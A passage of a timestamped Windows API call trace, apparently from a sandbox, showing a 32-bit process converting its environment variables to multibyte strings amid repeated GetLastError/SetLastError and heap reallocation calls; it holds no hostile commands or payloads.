0x70e668 [0064.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x70e668, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.217] GetLastError () returned 0x0 [0064.217] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711190) returned 0x24 [0064.218] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711190, Size=0x28) returned 0x711190 [0064.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0064.218] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x25) returned 0x70aa40 [0064.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70aa40, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.218] SetLastError (dwErrCode=0x0) [0064.218] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.219] SetLastError (dwErrCode=0x0) [0064.219] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711190) returned 0x28 [0064.220] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711190, Size=0x2c) returned 0x711190 [0064.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0064.220] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x39) returned 0x704f80 [0064.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x704f80, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.220] SetLastError (dwErrCode=0x0) [0064.220] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.221] SetLastError (dwErrCode=0x0) [0064.221] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711190) returned 0x2c [0064.222] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711190, Size=0x30) returned 0x711190 [0064.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0064.222] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x7111c8 [0064.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7111c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.222] GetLastError () returned 0x0 [0064.222] SetLastError (dwErrCode=0x0) [0064.223] GetLastError () returned 0x0 [0064.223] SetLastError (dwErrCode=0x0) [0064.223] GetLastError () returned 0x0 [0064.223] SetLastError (dwErrCode=0x0) [0064.223] GetLastError () returned 0x0 [0064.223] SetLastError (dwErrCode=0x0) [0064.223] GetLastError () returned 0x0 [0064.223] SetLastError (dwErrCode=0x0) [0064.223] GetLastError () returned 0x0 [0064.223] SetLastError (dwErrCode=0x0) [0064.223] GetLastError () returned 0x0 [0064.223] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.224] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.224] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.224] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.224] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.224] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.224] SetLastError (dwErrCode=0x0) [0064.224] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711190) returned 0x30 [0064.225] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711190, Size=0x34) returned 0x7111e8 [0064.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0064.225] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x711190 [0064.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x711190, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.225] GetLastError () returned 0x0 [0064.225] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.226] GetLastError () returned 0x0 [0064.226] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7111e8) returned 0x34 [0064.227] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7111e8, Size=0x38) returned 0x7111e8 [0064.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0064.227] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xe) returned 0x70e680 [0064.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x70e680, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.227] SetLastError (dwErrCode=0x0) [0064.227] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.228] SetLastError (dwErrCode=0x0) [0064.228] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] GetLastError () returned 0x0 [0064.229] SetLastError (dwErrCode=0x0) [0064.229] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7111e8) returned 0x38 [0064.229] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7111e8, Size=0x3c) returned 0x7111e8 [0064.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0064.230] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x69) returned 0x711230 [0064.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x711230, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.230] SetLastError (dwErrCode=0x0) [0064.230] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.231] SetLastError (dwErrCode=0x0) [0064.231] GetLastError () returned 0x0 [0064.232] SetLastError (dwErrCode=0x0) [0064.232] GetLastError () returned 0x0 [0064.232] SetLastError (dwErrCode=0x0) [0064.232] GetLastError () returned 0x0 [0064.232] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7111e8) returned 0x3c [0064.232] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7111e8, Size=0x40) returned 0x7111e8 [0064.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0064.232] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x704fc8 [0064.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x704fc8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0064.232] GetLastError () returned 0x0 [0064.232] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7111e8) returned 0x40 [0064.232] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7111e8, Size=0x44) returned 0x7112a8 [0064.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0064.232] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x70f0b8 [0064.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x70f0b8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0064.232] GetLastError () returned 0x0 [0064.232] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x44 [0064.232] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x48) returned 0x7112a8 [0064.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0064.232] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1d) returned 0x70f0e0 [0064.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x70f0e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0064.232] GetLastError () returned 0x0 [0064.232] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x48 [0064.232] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x4c) returned 0x7112a8 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0064.233] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x706bb0 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x706bb0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0064.233] GetLastError () returned 0x0 [0064.233] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x4c [0064.233] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x50) returned 0x7112a8 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0064.233] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x7111e8 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x7111e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0064.233] GetLastError () returned 0x0 [0064.233] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x50 [0064.233] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x54) returned 0x7112a8 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0064.233] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x711208 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x711208, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0064.233] GetLastError () returned 0x0 [0064.233] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x54 [0064.233] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x58) returned 0x7112a8 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0064.233] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x70f108 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x70f108, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0064.233] GetLastError () returned 0x0 [0064.233] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x58 [0064.233] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x5c) returned 0x7112a8 [0064.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0064.233] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70aa70 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x70aa70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0064.234] GetLastError () returned 0x0 [0064.234] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x5c [0064.234] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x60) returned 0x7112a8 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 